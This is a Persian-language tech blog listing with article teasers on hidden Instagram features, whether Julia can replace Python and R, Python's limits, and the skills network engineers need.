این روزها دیگر اینستاگرام تنها مورد علاقه نوجوانان و سلبریتی‌ها نیست و خیلی‌ها از آن به عنوان یک شبکه اجتماعی محبوب یاد می‌کنند. در واقع، بر اساس گزارش مرکز پژوهشی Pew بیش از 35 درصد بزرگسالانی که از اینترنت استفاده می‌کنند در اینستاگرام نیز عضو هستند. علاوه بر این، استفاده از این شبکه اجتماعی سطحی و گذار نیست. این آمار نشان می‌دهد که 38 درصد از این افراد روزانه چندین نوبت از اینستاگرام استفاده می‌کنند. اما برای آن‌هایی که هرگز از این سکوی پرتاب به دنیای مجازی استفاده نکرده‌اند، و یا کسانی که می‌خواهند حرفه‌ایتر از این پلتفرم استفاده کنند، اینستاگرام ترفندها، تنظیمات، گزینه‌های جستجو و قابلیتهای کمتر شناخته شده‌تری را در نظر گرفته است. در این مقاله که در دو بخش ارائه خواهد شد شما با 23 قابلیت پنهان گنجانده شده در اپلیکیشن اینستاگرام آشنا می‌شوید.

توجه داشته باشید که قبل از شروع به کار آخرین نسخه اینستاگرام را نصب کرده باشید. همچنین این نکته را نیز در نظر داشته باشید که با وجودی که مثال‌های موجود در این مقاله روی دستگاه‌های آی‌فون و اندروید ارائه شده است، اما می‌توان خیلی از آنها را روی نسخه وب و اپلیکیشن ویندوز اینستاگرام نیز پیاده سازی کرد. 

ادامه مطلب ...

آیا جولیا می‌تواند جایگزین زبان‌های بزرگی همچون پایتون و آر شود؟

زبان برنامه‌نویسی جولیا که نزدیک به 14 روز پیش (در زمان نگارش این مقاله) نسخه پایدار آن (1.0.2) منتشر شد، در مقایسه با زبان‌های برنامه‌نویسی رایج و محبوبی همچون پایتون عملکردی به مراتب انعطاف‌پذیرتر دارد. لازم به توضیح است که نگارش 1 این زبان در ماه اوت ارائه شد، زبانی که تیمی متشکل از برجسته‌ترین پژوهشگران دانشگاه MIT فرآیند توسعه آن‌را عهده‌دار بودند. یک زبان برنامه‌نویسی قدرتمند که به اعتقاد بسیاری از کارشناسان در آینده‌ای نه چندان دور به یکی از محبوب‌ترین زبان‌های برنامه‌نویسی تبدیل خواهد شد. 
ادامه مطلب ...

زبان پایتون برای چه کارهایی مناسب نیست

پایتون مناسب چه کاری است

به طور خلاصه، پایتون به یک زبان یادگیری ماشینی تبدیل شده است. اغلب برنامه‌های یادگیری ماشینی با استفاده از زبان پایتون نوشته می‌شوند و در مباحث مرتبط با کدنویسی در کلاس‌های درس و آموزش کار با رزبری پای همیشه پایتون به عنوان یک بخش از آموزش برنامه نویسی در نظر گرفته می‌شود.

این دلایل به همراه تعداد قابل توجهی از شرکت‌های بزرگ که از پایتون استفاده می‌کنند، ذهن را به این سمت هدایت می‌کند که این همان زبان برنامه نویسی اصلی آینده است. اما اگر پایتون تا این اندازه کار راه انداز است، چرا شما نباید از آن استفاده کنید؟ 

ادامه مطلب ...

مهارت‎هایی که یک مهندس شبکه در سال جدید به آن نیاز خواهد داشت

از آنجا که مهندسان شبکه قلب این زیرساخت را مدیریت و هدایت می‎کنند، اکنون به درک عمیق‎تری از اپلیکیشن‎ها و داده‎های موجود در سراسر شبکه نیاز دارند. این موضوع به‌ویژه زمانی بیشتر نمود پیدا می‎کند که به‌لطف فناوری‎های جدیدتری مثل مجازی‌سازی، کانتینرها و فناوری نوظهور hyperconvergence، مدیریت سرورها و ذخیره‌سازی داده به‌صورت محلی و مجتمع در حال منسوخ شدن هستند. از آنجا که این شبکه است که هسته مرکزی پیوند این فناوری‎ها را با یکدیگر شکل می‎دهد، مهندسان شبکه باید با درک درست این دانش روز یکپارچگی بین این فناوری‎ها را فراهم کنند.
از دیگر مهارت‎هایی که امروز مهندسان شبکه باید کسب کنند، نحوه صحیح به‌کارگیری این فنون جدید است. با فناوری‎هایی مثل اتوماسیون و شبکه‎های نرم‎افزار محور (SDN) شبکه‎های امروزی باید بر اساس نوع کاربردشان سفارشی شوند. بنابراین، مهندسان باید قادر به درک اولویت‎های کاری، جریان‎های ترافیک و سایر سیاست‌گذاری‎ها برای بهینه‌سازی نقل و انتقال داده باشند. دورانی که مدیران شبکه تنها لازم بود در مورد لایه‎های یک تا چهار OSI اطلاعات داشته باشند به سر آمده است. امروز باید درباره همه زمینه‎های کاربردی شبکه اطلاعات کسب کنیم و سرانجام امنیت نیز نقش قابل ملاحظه‎ای در انجام وظایف یک مهندس شبکه ایفا می‎کند. امنیت دیگر یک چاره‌اندیشی موقت نیست و باید به اولین اولویت هر پروژه زیربنایی جدید تبدیل شود. این مهندسان هستند که وضعیت دفاعی امنیتی یک شرکت را ارزیابی و برای آن چاره‌اندیشی می‎کنند. این نکته نیز حائز اهمیت است که هرچه اندازه و تنوع مهارت‎های کسب شده در زمینه فناوری‎های شبکه بیشتر باشد، میزان تقاضا و رغبت برای استخدام فرد متخصص توسط کارفرمایان بیشتر می‌شود و دستمزد بالاتری نیز دریافت خواهند کرد. در ادامه نگاهی به فناوری‎ها و مهارت‎هایی خواهیم داشت که شما برای تبدیل شدن به یک مهندس شبکه سازمانی خبره و به‎روز به آن نیاز دارید. همچنین، در انتها نگاهی خواهیم داشت به 5 سمت شغلی در زمینه شبکه‎های سازمانی که بیشترین میزان دستمزد سالانه را دریافت می‎کنند.

  ادامه مطلب ...